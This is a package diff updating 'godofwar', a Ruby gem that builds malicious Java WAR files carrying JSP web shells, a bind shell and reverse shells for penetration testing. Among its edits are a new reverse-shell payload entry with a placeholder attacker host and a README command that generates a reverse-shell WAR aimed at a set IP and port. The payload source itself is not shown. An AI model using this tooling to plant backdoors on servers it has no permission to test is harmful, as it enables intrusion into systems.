godofwar 1.0.1 → 1.1.0

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: 02a2315d93cc609cc8995e7c53ed79e27eb19786371d99b6604b212e4c2a5d53
-  data.tar.gz: feb713a3b750d8703371a5bacf60a525d5c16d3fe225247e5015fd14e6f8c464
+  metadata.gz: 10bc19a2578d15ba14d62be3a3181a1a58811262b4786d148c40427b212f738b
+  data.tar.gz: 7479441d79cc87cceba61edc2368f569cbf3efbccba00db00668f529e9c9fbd5
 SHA512:
-  metadata.gz: 35891b78552023889a009222df08c8712a99516c2c72581722d8d1e1add71f5e6a45e2cf777afd102e8c05cbe291af13b30b7c2a8591ecf8f8833dc4267258a2
-  data.tar.gz: 65fd0d1a175fb71a253c600b68db5a6877275bd733e72ac2931b31c7aa04039e98bec79032183c5e54437d9b550fc29b6520a034e2bf6ad49c9a46827e9cec1c
+  metadata.gz: 28ccb54673055e2eb62d8bd91190087562a7e72d8971edcab708c4c31fb5c337b5b89e9d41a5432225dcb3ff85fb9327e4589fb995e2eef522393358547ab05f
+  data.tar.gz: 003c4ecf9b34184ff948269d1b44168b926199bd9d4a89f5a3d853170e2424d2bbd53b5481342ad380344d367588ae6b297a3ea8d63d0155f54d5fdcbbfe0704

data/.gitignore

@@ -0,0 +1,58 @@
+/.bundle/
+/.yardoc
+/_yardoc/
+/coverage/
+/doc/
+/pkg/
+/spec/reports/
+/tmp/
+### Ruby template
+*.gem
+*.rbc
+/.config
+/coverage/
+/InstalledFiles
+/pkg/
+/spec/reports/
+/spec/examples.txt
+/test/tmp/
+/test/version_tmp/
+/tmp/
+
+# Used by dotenv library to load environment variables.
+# .env
+
+## Specific to RubyMotion:
+.dat*
+.repl_history
+build/
+*.bridgesupport
+build-iPhoneOS/
+build-iPhoneSimulator/
+
+## Specific to RubyMotion (use of CocoaPods):
+#
+# We recommend against adding the Pods directory to your .gitignore. However
+# you should judge for yourself, the pros and cons are mentioned at:
+# https://guides.cocoapods.org/using/using-cocoapods.html#should-i-check-the-pods-directory-into-source-control
+#
+# vendor/Pods/
+
+## Documentation cache and generated files:
+/.yardoc/
+/_yardoc/
+/doc/
+/rdoc/
+
+## Environment normalization:
+/.bundle/
+/vendor/bundle
+/lib/bundler/man/
+
+
+# .idea
+.idea/
+
+
+# mpeltonen/sbt-idea plugin
+.idea_modules/# JIRA pluginatlassian-ide-plugin.xml

data/README.md

@@ -49,8 +49,9 @@ GodOfWar - Malicious Java WAR builder.
     - cmd_get
     - filebrowser
     - bind_shell
+    - reverse_shell
     - reverse_shell_ui 
-- Configurable backdoor. (try `--host/-port`)
+- Configurable backdoor. (try `--host/--port`)
 - Control over payload name. 
   - To avoid malicious name after deployment to bypass URL name signatures.
 
@@ -89,7 +90,7 @@ $ godofwar -l
 │       ├── Settings:    {"false"=>"No Settings required!"}
 │       ├── Usage:       http://host/cmd.jsp?cmd=whoami
 │       ├── References:  ["https://github.com/danielmiessler/SecLists/tree/master/Payloads/laudanum-0.8/jsp"]
-│       └── Local Path:  /FULL/PATH/HERE/godofwar/payloads/cmd_get
+│       └── Local Path:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/cmd_get
 ├── filebrowser
 │   └── Information:
 │       ├── Description: Remote file browser, upload, download, unzip files and native command execution
@@ -97,7 +98,7 @@ $ godofwar -l
 │       ├── Settings:    {"false"=>"No Settings required!"}
 │       ├── Usage:       http://host/filebrowser.jsp
 │       ├── References:  ["http://www.vonloesch.de/filebrowser.html"]
-│       └── Local Path:  /FULL/PATH/HERE/godofwar/payloads/filebrowser
+│       └── Local Path:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/filebrowser
 ├── bind_shell
 │   └── Information:
 │       ├── Description: TCP bind shell
@@ -105,26 +106,48 @@ $ godofwar -l
 │       ├── Settings:    {"port"=>4444, "false"=>"No Settings required!"}
 │       ├── Usage:       http://host/reverse-shell.jsp
 │       ├── References:  ["Metasploit - msfvenom -p java/jsp_shell_bind_tcp"]
-│       └── Local Path:  /FULL/PATH/HERE/godofwar/payloads/bind_shell
+│       └── Local Path:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/bind_shell
 ├── reverse_shell_ui
 │   └── Information:
-│       ├── Description: TCP reverse shell with a UI to set LHOST and LPORT from browser.
-│       ├── OS:          windows
+│       ├── Description: TCP reverse shell with a HTML form to set LHOST and LPORT from browser.
+│       ├── OS:          any
 │       ├── Settings:    {"host"=>"attacker", "port"=>4444, "false"=>"No Settings required!"}
 │       ├── Usage:       http://host/reverse_shell_ui.jsp
 │       ├── References:  []
-│       └── Local Path:  /FULL/PATH/HERE/godofwar/payloads/reverse_shell_ui
+│       └── Local Path:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell_ui
+├── reverse_shell
+│   └── Information:
+│       ├── Description: TCP reverse shell. LHOST and LPORT are hardcoded
+│       ├── OS:          any
+│       ├── Settings:    {"host"=>"attacker", "port"=>4444, "false"=>"No Settings required!"}
+│       ├── Usage:       http://host/reverse_shell.jsp
+│       ├── References:  []
+│       └── Local Path:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell
 ```
 
 **Generate payload with LHOST and LPORT**
 ```
-godofwar -p reverse_shell_ui -H 192.168.100.10  -P 9911 -o puppy
+godofwar -p reverse_shell -H 192.168.100.10 -P 9911 -o puppy
 ```
+After deployment, you can visit your shell on (http://host:8080/puppy/puppy.jsp) 
 
 ## Contributing
 
-Bug reports and pull requests are welcome on GitHub at https://github.com/[USERNAME]/godofwar.
-
+1. Fork it ( https://github.com/KINGSABRI/godofwar/fork ).
+2. Create your feature branch (git checkout -b my-new-feature).
+3. Commit your changes (git commit -am 'Add some feature').
+4. Push to the branch (git push origin my-new-feature).
+5. Create a new Pull Request.
+
+### Add More Backdoors
+To contribute by adding more backdoors:
+1. create a new folder under `payloads` directory.
+2. put your `jsp` file under the newly created directory (make it the same directory name).
+3. update `payloads_info.json` file with
+    1. description. 
+    2. supported operating system (try to make it universal though).
+    3. configurations: default host and port.
+    4. references: the payload origin or its creator credits.
 
 ## License
 

data/bin/godofwar

@@ -3,8 +3,6 @@
 # GodOfWare - A command-line tool to generate war payloads for penetration testing / red teaming purposes.
 # @Author: KING SABRI - @KINGSABRI
 #
-lib = File.expand_path("../../lib", __FILE__)
-$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
 require 'godofwar'
 
 options = OpenStruct.new(payload: nil, host: nil, port: nil,
@@ -17,22 +15,23 @@ option_parser.separator "\nHelp menu:".underline
 option_parser.on('-p', '--payload PAYLOAD',
                  'Generates war from one of the available payloads.',
                  "\t(check -l/--list)"
-) {|v| options.payload = v}
+) { |v| options.payload = v }
 
 option_parser.on('-H', '--host IP_ADDR',
                  'Local or Remote IP address for the chosen payload',
                  "\t(used with -p/--payload)"
-) {|v| options.host = v}
+) { |v| options.host = v }
 option_parser.on('-P', '--port PORT', Integer,
                  'Local or Remote Port for the chosen payload',
                  "\t(used with -p/--payload)"
-) {|v| options.port = v}
+) { |v| options.port = v }
 option_parser.on('-o', "--output [FILE]",
                  'Output file and the deployment name.',
                  "\t(default is the payload original name. check '-l/--list')") do |v|
   options.output = v
 end
 option_parser.on('-l', '--list', 'list all available payloads.') { |v| options.list = v }
+option_parser.on('-v', '--version', 'Show the current version.') { |v| options.version = v }
 option_parser.on('-h', '--help', 'Show this help message') {puts GodOfWar::Utils.banner , option_parser; exit!}
 
 begin
@@ -40,6 +39,8 @@ begin
   payloads = GodOfWar::Payloads.new
 
   case
+  when options.version
+    puts "GodOfWar v#{GodOfWar::VERSION}"
   when options.list
     puts payloads.list_tree
   when options.payload

data/godofwar.gemspec

@@ -9,17 +9,17 @@ Gem::Specification.new do |spec|
   spec.authors       = ["KINGSABRI"]
   spec.email         = ["king.sabri@gmail.com"]
 
-  spec.summary       = %q{Evil war builder for hackers with built-in war payloads.}
+  spec.summary       = %q{GodOfWar - Malicious Java WAR builder}
   spec.description   = %q{Evil war builder for hackers with built-in war payloads.}
   spec.homepage      = "https://github.com/KINGSABRI/godofwar"
   spec.license       = "MIT"
 
-  spec.files         = Dir.glob("**/*")
-  spec.bindir        = "bin"
-  spec.executables   = ["godofwar"]
-  spec.require_paths = ["lib"]
+  spec.files         = `git ls-files -z`.split("\x0").reject {|f| f.match(%r{^(test|spec|features)/})}
+  spec.bindir        = 'bin'
+  spec.executables   = ['godofwar']
+  spec.require_paths = ['lib']
 
-  spec.add_dependency 'rubyzip'
+  spec.add_dependency 'rubyzip', '~> 1.2'
 
   spec.metadata["homepage_uri"]    = spec.homepage
   spec.metadata["source_code_uri"] = "https://github.com/KINGSABRI/godofwar"

data/lib/godofwar/builder.rb

@@ -78,10 +78,12 @@ module GodOfWar
           MANIFEST
 
       File.write(manifest_mf_path, manifest_mf)
-      puts "#{File.join(@war_dir, 'META-INF', 'MANIFEST.MF')}".step_success
+      puts "#{manifest_mf_path}".step_success
     end
 
     def set_payload(host, port)
+      puts "Setting up payload:".tell
+
       payload_file = File.join(@payload.path, "#{@payload.name}.jsp")
 
       if @payload.conf.empty?
@@ -90,11 +92,12 @@ module GodOfWar
         host = host.nil? ? @payload.conf["host"] : host
         port = port.nil? ? @payload.conf["port"] : port
         payload_raw = File.read(payload_file)
-                          .sub('HOSTHOST', "#{host}").sub('PORTPORT', "#{port}")
+                          .sub('HOSTHOST', "#{host}")
+                          .sub('PORTPORT', "#{port}")
       end
+      puts "#{@payload.name}.jsp ⟿ #{@output}.jsp".step_success
       File.write(File.join(@output, "#{@output}.jsp"), payload_raw)
-      puts "Setting up payload:".tell
-      puts "#{File.join(@war_dir, @payload.name)}.jsp".step_success
+      puts "#{File.join(@war_dir, @output)}.jsp".step_success
     end
 
     # build_war build the WAR file by recursively the source directory content then zip it

data/lib/godofwar/payloads.rb

@@ -71,20 +71,20 @@ module GodOfWar
     #
     def list_tree
       payloads_parse.map do |payload|
-        if payload.conf["true"]
-          payload.conf = payload.conf.values.first
+        if payload.conf.empty?
+          payload.conf = 'No Settings required!'
         else
-          payload.conf["false"] = 'No Settings required!'
+          payload.conf
         end
 
-        "├── " + "#{payload.name}\n".bold   +
-            "│   └── Information:\n"        +
-            "│       ├── Description: #{payload.desc}\n" +
-            "│       ├── OS:          #{payload.os}\n"   +
-            "│       ├── Settings:    #{payload.conf}\n" +
-            "│       ├── Usage:       #{payload.url}\n"  +
-            "│       ├── References:  #{payload.ref}\n"  +
-            "│       └── Local Path:  #{payload.path}"
+        "├── " + "#{payload.name}\n".bold            +
+        "│   └── Information:\n"                     +
+        "│       ├── Description: #{payload.desc}\n" +
+        "│       ├── OS:          #{payload.os}\n"   +
+        "│       ├── Settings:    #{payload.conf}\n" +
+        "│       ├── Usage:       #{payload.url}\n"  +
+        "│       ├── References:  #{payload.ref}\n"  +
+        "│       └── Local Path:  #{payload.path}"
       end
     end
   end

data/lib/godofwar/version.rb

@@ -1,3 +1,3 @@
 module GodOfWar
-  VERSION = "1.0.1"
+  VERSION = "1.1.0"
 end

data/payloads/payloads_info.json

@@ -3,35 +3,35 @@
     "desc"  : "Command execution via web interface",
     "os"    : "any",
     "conf"  : {},
-    "url"   : "http://host/cmd.jsp?cmd=whoami",
+    "url"   : "http://host:8080/cmd/cmd.jsp?cmd=whoami",
     "ref"   : ["https://github.com/danielmiessler/SecLists/tree/master/Payloads/laudanum-0.8/jsp"]
   },
   "filebrowser": {
     "desc"  : "Remote file browser, upload, download, unzip files and native command execution",
     "os"    :  "any",
     "conf"  : {},
-    "url"   : "http://host/filebrowser.jsp",
+    "url"   : "http://host:8080/filebrowser/filebrowser.jsp",
     "ref"   : ["http://www.vonloesch.de/filebrowser.html"]
   },
   "bind_shell": {
     "desc"  : "TCP bind shell",
     "os"    : "any",
     "conf"  : {"port": 4444},
-    "url"   : "http://host/reverse-shell.jsp",
+    "url"   : "http://host:8080/bind-shell/bind-shell.jsp",
     "ref"   : ["Metasploit - msfvenom -p java/jsp_shell_bind_tcp"]
   },
   "reverse_shell_ui": {
     "desc"  : "TCP reverse shell with a HTML form to set LHOST and LPORT from browser.",
     "os"    : "any",
     "conf"  : {"host": "attacker", "port": 4444},
-    "url"   : "http://host/reverse_shell_ui.jsp",
-    "ref"   : []
+    "url"   : "http://host:8080/reverse_shell_ui/reverse_shell_ui.jsp",
+    "ref"   : ["unknown"]
   },
   "reverse_shell": {
-    "desc"  : "TCP reverse shell. LHOST and LPORT are hardcoded",
+    "desc"  : "TCP reverse shell, it runs once you brows the file. LHOST and LPORT are hardcoded",
     "os"    : "any",
     "conf"  : {"host": "attacker", "port": 4444},
-    "url"   : "http://host/reverse_shell.jsp",
-    "ref"   : []
+    "url"   : "http://host:8080/reverse_shell/reverse_shell.jsp",
+    "ref"   : ["unknown"]
   }
 }

metadata

@@ -1,29 +1,29 @@
 --- !ruby/object:Gem::Specification
 name: godofwar
 version: !ruby/object:Gem::Version
-  version: 1.0.1
+  version: 1.1.0
 platform: ruby
 authors:
 - KINGSABRI
 autorequire: 
 bindir: bin
 cert_chain: []
-date: 2019-04-05 00:00:00.000000000 Z
+date: 2019-04-16 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
   name: rubyzip
   requirement: !ruby/object:Gem::Requirement
     requirements:
-    - - ">="
+    - - "~>"
       - !ruby/object:Gem::Version
-        version: '0'
+        version: '1.2'
   type: :runtime
   prerelease: false
   version_requirements: !ruby/object:Gem::Requirement
     requirements:
-    - - ">="
+    - - "~>"
       - !ruby/object:Gem::Version
-        version: '0'
+        version: '1.2'
 description: Evil war builder for hackers with built-in war payloads.
 email:
 - king.sabri@gmail.com
@@ -32,9 +32,9 @@ executables:
 extensions: []
 extra_rdoc_files: []
 files:
+- ".gitignore"
 - CODE_OF_CONDUCT.md
 - Gemfile
-- Gemfile.lock
 - README.md
 - Rakefile
 - bin/godofwar
@@ -77,5 +77,5 @@ rubyforge_project:
 rubygems_version: 2.7.6
 signing_key: 
 specification_version: 4
-summary: Evil war builder for hackers with built-in war payloads.
+summary: GodOfWar - Malicious Java WAR builder
 test_files: []

data/Gemfile.lock

@@ -1,19 +0,0 @@
-PATH
-  remote: .
-  specs:
-    godofwar (0.1.1)
-      rubyzip
-
-GEM
-  remote: https://rubygems.org/
-  specs:
-    rubyzip (1.2.2)
-
-PLATFORMS
-  ruby
-
-DEPENDENCIES
-  godofwar!
-
-BUNDLED WITH
-   2.0.1